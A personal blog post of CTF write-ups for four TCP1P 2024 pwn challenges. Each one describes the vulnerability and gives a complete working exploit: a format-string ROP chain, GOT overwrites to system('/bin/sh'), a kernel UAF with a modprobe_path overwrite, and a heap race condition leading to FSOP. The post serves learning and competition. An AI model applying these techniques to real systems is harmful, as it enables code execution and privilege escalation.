Post

TCP1P 2024 - My PWN Write_ups

This weekend I have been participating solo in the TCP1P CTF 2024. I really enjoyed this CTF. I ended up solving some pretty good challenges and finished in 23rd place. As always, I focused on PWN, and here are my Write-Ups for the best challenges I solved.
Amnesia

Amnesia

Puntuacion

  • Category: Pwn.
  • Points: 221
  • Solves: 11
  • Author: itoid

Description

Amnesia is the typical challenge with a vulnerable format string, but with certain limitations to make our life a bit harder. The program has a first format string that accepts up to 188 characters, after which there is a loop that runs infinitely until we decide to terminate the program by writing I remember everything!. Inside that loop, there is another vulnerable format string, but it only accepts up to 32 characters. The format strings are checked against a blacklist that prohibits the use of the characters $, p, and x. The file has all the typical protections enabled and the syscalls execve and execveat are prohibited by seccomp.

1
2
3
4
5
6
7
8
9
10
➜  Amnesia checksec amnesia
[*] '/home/elchals/CTFs/Tcp1p/Amnesia/amnesia'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled

Exploitation

I take advantage of the first format string to get all the necessary leaks: Text base, Libc base, and Stack. Since p and $ are prohibited, I have to use %c and %ld.
With the following format string, I am going to overwrite the blacklist, because since I now only have 32 characters in the format string and can’t use $, it becomes impossible to do anything more useful. In the first iteration, I overwrite the $ with any number.

1
2
payload = b'%c%c%d%c%d%c%c%c%c%c%hhn'.ljust(24, b'\x41')
payload += p64(format)

And in the second iteration, since I can now use $, I place a NULL byte to disable the blacklist.

1
2
payload = b'%256c%11$hhn'.ljust(24, b'\x41')
payload += p64(format)

From now on, since we can use the $, I write a ROP chain starting from the return address of the function to open the flag.txt, read, and write its content. I write it character by character since 32 bytes aren’t enough for anything more.
Finally, by writing I remember everything!, I trigger the termination of the program and the execution of the ROP chain.

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
#!/bin/python3
from pwn import *

context.log_level = 'INFO'
context.terminal = ['remotinator', 'vsplit', '-x']
context.arch = 'amd64'

######################################################################################

process_name = './amnesia_patched'
elf = context.binary = ELF(process_name)
libc = ELF('./libc.so.6')

HOST = "ctf.tcp1p.team"
PORT = 20037

######################################################################################

gdb_script = f'''
    breakrva 0x16d5
    continue
    '''

######################################################################################

def connect():
    if args.REMOTE:
        print(f"[*] Connecting to {HOST} : {PORT}")
        p = remote(HOST, PORT)
    elif args.GDB:
        print(f'[*] Debugging {elf.path}.')
        p = gdb.debug([elf.path], gdbscript=gdb_script)
    else:
        print(f'[*] Executing {elf.path}.')
        p = process([elf.path], aslr=False)
    return p

## Write one byte.
def change_byte(addr, b):
    if b == 0:
        b = 0x100
    payload = f'%{b}c%11$hhn'.encode().ljust(24, b'\x41')
    payload += p64(addr)
    print(payload)
    p.sendlineafter(b'remember?', payload)

######################################################################################

p = connect()

## Leaking things
payload  = b'%c' * 2
payload += b'||%ld||'
payload += b'%c'
payload += b'||%ld||'
payload += b'%c' * 35
payload += b'%||%ld||'

p.sendlineafter(b'you?', payload)
p.recvuntil(b'||')
libc.address = int(p.recvuntil(b'||')[:-2]) - (0x70fe15514887 - 0x70fe15400000)
print("[i] Libc Address:", hex(libc.address))

p.recvuntil(b'||')
stack = int(p.recvuntil(b'||')[:-2])
print("[i] Stack:", hex(stack))

rip = stack + (0x7ffcb0edf088 - 0x7ffcb0edea30) 
print("[i] RIP:", hex(rip))

p.recvuntil(b'||')
elf.address = int(p.recvuntil(b'||')[:-2]) - (0x5b435bdd36f7 - 0x5b435bdd2000)
print("[i] .text:", hex(elf.address))

## Overwriting Blacklist
format = elf.address + (0x65066ca92010 - 0x65066ca8e000)    # Blacklist address

payload = b'%c%c%d%c%d%c%c%c%c%c%hhn'.ljust(24, b'\x41')
payload += p64(format)
print(payload)
p.sendlineafter(b'remember?', payload)

payload = b'%256c%11$hhn'.ljust(24, b'\x41')
payload += p64(format)
print(payload)
p.sendlineafter(b'remember?', payload)

## Writing flag.txt to bss section
bss = elf.address + (0x63e12b96f000 - 0x63e12b96b000) + 0x900
print("[i] BSS:", hex(bss))

flag = b'flag.txt\x00'
idx = 0
for b in flag:
    change_byte(bss + idx, b)
    idx += 1

## ROP
context.arch = 'amd64'
rop_libc = ROP(libc)

pop_rsi  = p64(rop_libc.find_gadget(['pop rsi', 'ret'])[0])
pop_rdi  = p64(rop_libc.find_gadget(['pop rdi', 'ret'])[0])
ret      = p64(rop_libc.find_gadget(['ret'])[0])
pop_rdx_rbx  = p64(libc.address + 0x00000000000904a9) # pop rdx ; pop rbx ; ret
pop_rax  = p64(rop_libc.find_gadget(['pop rax', 'ret'])[0])
push_rax = p64(libc.address + 0x0000000000041563) # push rax ; ret
mov_edi_eax = p64(libc.address + 0x000000000012684c) # mov edi, eax ; call rdx

payload  = pop_rdi
payload += p64(bss)
payload += pop_rsi
payload += p64(0)
payload += p64(libc.sym.open)

payload += pop_rdx_rbx
payload += pop_rsi * 2
payload += mov_edi_eax
payload += pop_rsi
payload += p64(bss)
payload += pop_rdx_rbx
payload += p64(0x100) * 2
payload += p64(libc.sym.read)

payload += pop_rdi
payload += p64(1)
payload += pop_rsi
payload += p64(bss)
payload += pop_rdx_rbx
payload += p64(0x100) * 2
payload += p64(libc.sym.write)

idx = 0
for b in payload:
    change_byte(rip + idx, b)
    idx += 1

p.sendlineafter(b'remember?', b'I remember everything!')

######################################################################################

p.interactive()

Baby CFHP

Baby

  • Category: Pwn.
  • Points: 221
  • Solves: 11
  • Author: rui

Description

This challenge allows us to write a single byte at the address we want. That byte is encoded using:

1
*ptr = (*ptr & ~((1<<16)-1)) | ((*ptr & 0xff) ^ ((val & 0xff) ^ ((val & 0xff) >> 1))) | (*ptr & 0xffff &~0xff);	

Challenge protections:

1
2
3
4
5
6
7
8
9
10
➜  baby_cfhp checksec chall  
[*] '/home/elchals/CTFs/Tcp1p/baby_cfhp/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Exploitation

I haven’t tried to decipher how that encoding works. Instead, I have created a function to obtain the byte I need to write using brute force.

1
2
3
4
5
6
def find_value(ptr, val):
    for i in range(0x100):
        b = ptr ^ (i ^ (i >> 1))
        if b == val:
            print("[i] byte:", hex(i))
            return i

I used the first flip byte to modify exit@Got so that it points to _start, creating an infinite loop to perform all the necessary flips. After that, I change it to call main. Then, I obtain a libc leak from stderr by pointing setbuf@got to puts. Finally, I call system(“/bin/sh”) by modifying setbuf@got to point to system and writing “/bin/sh” to stderr.

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#!/bin/python3
from pwn import *

context.log_level = 'INFO'
context.terminal = ['remotinator', 'vsplit', '-x']
context.arch = 'amd64'

######################################################################################

process_name = './chall_patched'
elf = context.binary = ELF(process_name)
libc = ELF('./libc.so.6')

HOST = "ctf.tcp1p.team"
PORT = 20011

######################################################################################

gdb_script = f'''
    #set breakpoint pending on
    continue
    '''

def find_value(ptr, val):
    for i in range(0x100):
        b = ptr ^ (i ^ (i >> 1))
        if b == val:
            print("[i] byte:", hex(i))
            return i

def change_addr(addr, new_byte, actual_byte):
    new_byte = find_value(actual_byte, new_byte)
    p.sendlineafter(b'address:', str(addr).encode())
    p.sendlineafter(b'value:', str(new_byte).encode())

def write_qword(addr, actual_value, new_value):
    actual_value = p64(actual_value)
    new_value = p64(new_value)

    for i in range(8):
        print(f"Addr {hex(addr + i)}, {hex(new_value[i])}, {hex(actual_value[i])}")
        change_addr(addr + i, new_value[i], actual_value[i])

def connect():
    if args.REMOTE:
        print(f"[*] Connecting to {HOST} : {PORT}")
        p = remote(HOST, PORT, ssl=False)        
    elif args.GDB:
        print(f'[*] Debugging {elf.path}.')
        p = gdb.debug([elf.path], gdbscript=gdb_script, aslr=False)
    else:
        print(f'[*] Executing {elf.path}.')
        p = process([elf.path])
    return p


######################################################################################

p = connect()

# exit@got -> _start
change_addr(elf.got.exit, 0xd0, 0x70)

# Looping Main
# [0x404018] stack_chk_fail@got -> main 
change_addr(elf.got.__stack_chk_fail, 0xb6, 0x30)
change_addr(elf.got.__stack_chk_fail+1, 0x11, 0x10)

# exit@got -> __stack_chk_fail@plt> -> main
change_addr(elf.got.exit, 0x80, 0xd0)

# Leaking Libc Base with setbuf->puts
# [0x404020] setbuf@Got -> 0x7ffff7c80e50 <puts>
change_addr(elf.got.setbuf, 0x50, 0xe0)
change_addr(elf.got.setbuf+1, 0x0e, 0x7f)

# Stderr+8 = libc address
# 0x404080 <stderr@GLIBC_2.2.5>:	0x00007ffff7e1b6a0	
# 0x7ffff7e1b6a0 <_IO_2_1_stderr_>:	0x00000000fbad2087	0x00007ffff7e1b723
change_addr(0x404080, 0xa8, 0xa0)

# exit@got -> _start
# $2 = {<text variable, no debug info>} 0x4010d0 <_start>
# [0x404038] exit@GLIBC_2.2.5 -> 0x401080 (__stack_chk_fail@plt) ◂— endbr64 
change_addr(elf.got.exit, 0xd0, 0x80)

p.recvline()
p.recvline()
leak = u64(p.recvline().strip().ljust(8, b'\x00')) 
libc.address = leak - (0x7ffff7e1b723 - 0x7ffff7c00000)
print("[i] Libc Base:", hex(libc.address))

# ROP
rop_libc = ROP(libc)
binSh    = next(libc.search(b"/bin/sh"))
system = libc.sym.system

print("[i] BinSh:", hex(binSh))

# 0x401080 <__stack_chk_fail@plt>:	endbr64
# exit@got -> __stack_chk_fail@plt> -> main
change_addr(elf.got.exit, 0x80, 0xd0)

# 0x404080 <stderr@GLIBC_2.2.5>:	0x00007ffff7e1b6a0	-> binSh
actual_value = libc.address + (0x00007ffff7e1b6a8 - 0x7ffff7c00000)
write_qword(0x404080, binSh, actual_value)

# [0x404020] setbuf@GLIBC_2.2.5 -> 0x7ffff7c80e50 (puts) ◂— endbr64 
# setbuf@GLIBC_2.2.5 -> System
write_qword(elf.got.setbuf, system, libc.sym.puts)

# [0x404038] exit@GLIBC_2.2.5 -> 0x401080 (__stack_chk_fail@plt) ◂— endbr64 
# exit@GLIBC_2.2.5 -> start
change_addr(elf.got.exit, 0xd0, 0x80)

######################################################################################

p.interactive()

K-Revenge

K_revenge

  • Category: Pwn.
  • Points: 661
  • Solves: 4
  • Author: rui

Description

This is an exploitation challenge of a relatively simple Kernel module. The Kernel module accepts three commands through ioctl calls: Write, Read, and Free.

  • Write reads a buffer from userland and copies it to kernel space. The module allocates an object of the size indicated in the ioctl and stores the pointer to this object in a global variable. The size is limited from 0x80 to 0x400 bytes. Only one object can be allocated at a time.
  • Read reads from the object allocated in the global variable the number of bytes indicated by the ioctl and copies it to userland.
  • Free releases the object pointed to by the global variable but does not set the global variable to NULL, allowing for a Use-After-Free (UAF) and enabling a double free.
    One thing that makes this not a very difficult challenge is that the pointers in the SLUB free list are not mangled.

Exploitation

First, I obtained the kernel base through the UAF and timerfd. After this, I poisoned the SLUB free list to allocate an object in modprobe_path and overwrite it to read the flag.

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>

#define WRITE 0x1111 
#define READ 0x2222 
#define FREE 0x3333 

struct data{
    unsigned long size;
    char *buff;
};

struct data Data;
char buff[0x1000];


//######################################################################
//######################################################################

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}



void pausa() {
    printf("[!] PAUSA - pulsa una tecla.\n");
    getchar();
}

int open_file(char *file, int flags, int verbose){
    int fd = open(file, flags);
    if (fd < 0) {
        fatal("[!] Error al abrir el archivo.");
    } else {
        if (verbose) printf("[*] %s abierto con fd %d.\n", file, fd);
    }
    return fd;
}

void dump_buffer(void *buf, int len) {
    printf("\n[i] Dumping %d bytes.\n\n", len);
    for (int i = 0; i < len; i += 0x10){
        printf("ADDR[%d, 0x%x]:\t%016lx: 0x", i / 0x08, i, (unsigned long)(buf + i));
        for (int j = 7; j >= 0; j--) printf("%02x", *(unsigned char *)(buf + i + j));
        printf(" - 0x");
        for (int j = 7; j >= 0; j--) printf("%02x", *(unsigned char *)(buf + i + j + 8));
        puts("");
    }
}

void timer_leak() {
    int timefd =  syscall(__NR_timerfd_create, CLOCK_REALTIME, 0);
    struct itimerspec itimerspec;

	itimerspec.it_interval.tv_sec = 0;
	itimerspec.it_interval.tv_nsec = 0;
	itimerspec.it_value.tv_sec = 100;
	itimerspec.it_value.tv_nsec = 0;

	timerfd_settime(timefd, 0, &itimerspec, 0);
	close(timefd);
	sleep(1);
}

void setup() {
	system("echo -ne '#!/bin/sh\ncat /root/flag > /tmp/flag' > /tmp/p");
	system("chmod a+x /tmp/p");
	system("echo -ne '\xff\xff\xff\xff' > /tmp/executeme");
	system("chmod a+x /tmp/executeme");
	printf("[i] Modprobe Setup done.\n");
}

void finish() {
	system("/tmp/executeme ; cat /tmp/flag");
}

//######################################################################
//######################################################################


int main(){

    setup();    
    int fd = open_file("/dev/K", O_RDWR, 1);

    memset(buff, 0x41, 0x1000);

    Data.size = 0x100;
    Data.buff = buff;

    ioctl(fd, WRITE, &Data);
    memset(buff, 0, 0x1000);

    ioctl(fd, FREE, &Data);
    
    timer_leak();
    
    ioctl(fd, READ, &Data);
    
    unsigned long kernel_base = *((unsigned long *)Data.buff + 5) - 0x2fdb30;
    printf("[i] Kernel Base: 0x%lx\n", kernel_base);

    unsigned long modprobe = kernel_base + (0xffffffff8ab3f100 - 0xffffffff89000000);
    printf("[i] Modprobe: 0x%lx\n", modprobe);

    ioctl(fd, WRITE, &Data);

    memset(buff, 0, 0x1000);
    Data.size = 0x80;
    ioctl(fd, WRITE, &Data);
    ioctl(fd, READ, &Data);
    
    ioctl(fd, FREE, &Data);
    ioctl(fd, FREE, &Data);
    ioctl(fd, READ, &Data);
    dump_buffer(Data.buff, 0x80);

    *(unsigned long*)(buff + 0x40) = (unsigned long)modprobe - 0x30;
    memcpy(buff + 0x30, "/tmp/p\x00", 7);
    ioctl(fd, WRITE, &Data);
    ioctl(fd, WRITE, &Data);
    ioctl(fd, WRITE, &Data);

    finish();

    return 0;
}

SIM

SIM

  • Category: Pwn.
  • Points: 181
  • Solves: 13
  • Author: hygge

Description

SIM is a very interesting challenge. It is perhaps the one I liked the most and the one that was the most difficult for me. The challenge has a race condition in the ExecuteTerminate and ExecuteLaunch functions, which allows for both an OOB (Out-of-Bounds) and a UAF (Use-After-Free).
The protections of the binary are:

1
2
3
4
5
6
7
8
➜  SIM checksec chall 
[*] '/home/elchals/CTFs/Tcp1p/SIM/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

It uses GLIBC 2.35 and when the challenge is started, it creates a thread that is controlled from the parent process through the menu:

1
2
3
4
5
6
7
8
9
➜  SIM ./chall     
[*] Controller started
Options:
0. Create VM
1. Delete VM
2. Launch VM
3. Terminate VM
Input: 
[*] Backend started

Exploitation

First, I filled the tcache to obtain a libc leak using the race condition in ExecuteTerminate, causing a UAF by freeing the chunk before its contents are printed. Then, I obtained a heap leak by doing the same as before but with a chunk in tcache. After that, through the race condition in ExecuteLaunch, I performed a tcache poisoning to allocate a chunk in stdout and then ended up calling system(“/bin/sh”) using FSOP.

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
#!/bin/python3
from pwn import *
import time

context.log_level = 'INFO'
context.terminal = ['remotinator', 'vsplit', '-x']
context.arch = 'amd64'

######################################################################################

process_name = './chall_patched'
elf = context.binary = ELF(process_name)
libc = ELF('./libc.so.6')

HOST = "ctf.tcp1p.team"
PORT = 55551

######################################################################################

gdb_script = f'''
    #set breakpoint pending on
    continue
    '''

def create(idx, size, content, wait):
    if wait:
        p.sendlineafter(b'Input:', b'0')
    else:
        p.sendline(b'0')
    p.sendlineafter(b'>> ', str(idx).encode())
    p.sendlineafter(b'>> ', str(size).encode())
    p.sendlineafter(b'>> ', content)

def delete(idx):
    p.sendlineafter(b'Input:', b'1')
    p.sendlineafter(b'>> ', str(idx).encode())

def launch(idx):
    p.sendlineafter(b'Input:', b'2')
    p.sendlineafter(b'>> ', str(idx).encode())

def terminate():
    p.sendlineafter(b'Input:', b'3')
       

######################################################################################

def connect():
    if args.REMOTE:
        print(f"[*] Connecting to {HOST} : {PORT}")
        p = remote(HOST, PORT, ssl=False)        
    elif args.GDB:
        print(f'[*] Debugging {elf.path}.')
        p = gdb.debug([elf.path], gdbscript=gdb_script, aslr=False)
    else:
        print(f'[*] Executing {elf.path}.')
        p = process([elf.path])
    return p

def FSOP_payload(libc):
    file_struct_addr = libc.sym._IO_2_1_stdout_
    print(f'[*] STDOUT addr: {hex(file_struct_addr)}')

    # Payload. 
    # ======================================= #
    _IO_wfile_jumps = libc.symbols['_IO_wfile_jumps']
    __GI__IO_wfile_overflow = _IO_wfile_jumps + 0x18
    fake_vtable_pointer = __GI__IO_wfile_overflow - 0x38     # vtable + 0x38 -> __GI__IO_wfile_overflow
    widewide_data_struc_pointer = file_struct_addr
    flags = 0x3b111111fbad2005     

    fp = FileStructure()  
    fp.flags = flags
    fp._IO_read_ptr = 0x68732f6e69622f                       # /bin/bash
    fp._lock = file_struct_addr + 0x60  
    fp._wide_data = widewide_data_struc_pointer
    fp.vtable = fake_vtable_pointer
    fp._old_offset = libc.sym.system                         # wide_vtable + 0x68

    wide_vtable = file_struct_addr + 0x10
    
    payload  = bytes(fp)
    payload += p64(wide_vtable)

    print(fp)    
    return payload

######################################################################################

p = connect()

for i in range(12):
    create(i, 8, p8(0x40 + i) * 7, 1)

launch(0)

# Fill Tcache
for i in range(2, 9):
    delete(i)

delete(1)

terminate()
delete(0)   # Unsorted Bin

# Leak Libc from unsorted bin
print("[i] Leaking Libc Base...")
p.recvuntil(b'[*] Your Config: \n')
libc.address = u64(p.recv(8)) - (0x7ffff7e1ace0 - 0x7ffff7c00000)
print("[i] Libc base:", hex(libc.address))

create(0, 8, p8(0x40 ) * 7, 0)
for i in range(1, 9):
    create(i, 8, p8(0x40 + i) * 7, 1)

delete(8)   # Tcache

launch(7)
terminate()
delete(7)

create(7, 498, p8(0x50 ) * 7, 1)

# Leak Heap base
print("[i] Leaking Heap...")
p.recvuntil(b'\x91\x00\x00\x00\x00\x00\x00\x00')
heap = u64(p.recv(8)) << 12
print("[i] Heap:", hex(heap))

chunk = heap + 0x670 #0x660
print("[i] Chunk:", hex(chunk))

create(8, 8, p8(0x50 ) * 7, 0)  

for i in range(0, 5):
    delete(i)

delete(8)   # Victim chunk

payload = FSOP_payload(libc)

delete(11)
create(11, 0x78, payload[0x70:0x70+0x77], 1)

payload2 = p64(0) * 4
payload2 += payload

delete(10)
create(10, 0x120, payload2[:0x77], 1)

mangled_ptr = (libc.sym._IO_2_1_stdout_ - 0x20) ^ chunk >> 12

delete(5)
create(5, 0x21, p64(mangled_ptr), 1)

delete(7)   
create(7, 8, p8(0x47) * 7, 1)
launch(7)

delete(7)
time.sleep(2)
launch(5)

flags = 0x00000000fbad2887

p.recvuntil(b'Success')
terminate()

p.recvuntil(b'Success')

create(7, 8, p8(0x47) * 7, 0)

create(3, 8, p64(flags)[:-1], 1)
launch(3)

time.sleep(2)
launch(10)

######################################################################################

p.interactive()
This post is licensed under CC BY 4.0 by the author.